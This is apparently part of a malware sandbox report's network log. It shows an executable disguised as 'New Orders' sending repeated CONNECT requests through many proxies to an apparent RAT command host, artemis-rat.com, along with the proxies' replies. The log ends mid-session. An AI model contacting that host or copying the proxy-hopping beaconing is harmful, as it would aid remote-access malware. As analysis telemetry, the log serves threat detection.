                                                                                        509192.168.2.95137143.133.136.20888007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.929589033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        510192.168.2.950513120.197.40.21990027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.936455011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.961271048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.651612043 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        511192.168.2.951395147.75.92.251100107672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.938942909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.221457005 CET356INHTTP/1.0 502 Bad Gateway
                                                                                        Server: Zscaler/6.3
                                                                                        Content-Type: text/html
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        512192.168.2.950750202.166.219.8041537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.949275970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        513192.168.2.951524104.19.235.10807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.954185963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.108550072 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        514192.168.2.951481190.153.121.241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.956763983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        515192.168.2.951536104.17.210.9807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.959335089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.114202023 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        516192.168.2.951487198.23.229.203156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.960966110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        517192.168.2.95142243.129.228.4678917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.964421034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        518192.168.2.950829184.178.172.341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.971002102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        519192.168.2.951428122.116.150.290007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.976094961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        520192.168.2.95173743.134.167.2234437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.979638100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        521192.168.2.95149023.152.40.1550507672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.980402946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:48.300149918 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        522192.168.2.95174643.134.167.2234437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009053946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        523192.168.2.9514265.252.23.22010817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009058952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        524192.168.2.951384109.175.9.20380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009176970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.710570097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.793643951 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        525192.168.2.95149672.10.160.9030517672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009275913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        526192.168.2.95149872.10.160.9445957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009349108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.300935030 CET28INHTTP/1.1 502 Bad Gateway


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        527192.168.2.950807193.138.178.682827672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009366989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        528192.168.2.951457147.75.34.86100007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009449959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.312489986 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        529192.168.2.95149492.204.135.3786237672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009449959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.733478069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.538955927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        530192.168.2.950834115.96.208.12480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009542942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.414010048 CET72INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        531192.168.2.95142931.43.158.10888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009620905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        532192.168.2.951506194.4.50.61123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.009911060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        533192.168.2.95174943.134.167.2234437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.011239052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        534192.168.2.95142595.66.138.2188807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.012057066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        535192.168.2.95175943.134.167.2234437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.013781071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        536192.168.2.951390120.77.148.13880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.019540071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.379000902 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        537192.168.2.951423202.162.219.1010807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.026185989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        538192.168.2.95145245.138.87.23810807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.030827045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        539192.168.2.95135143.231.22.229807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.033324957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
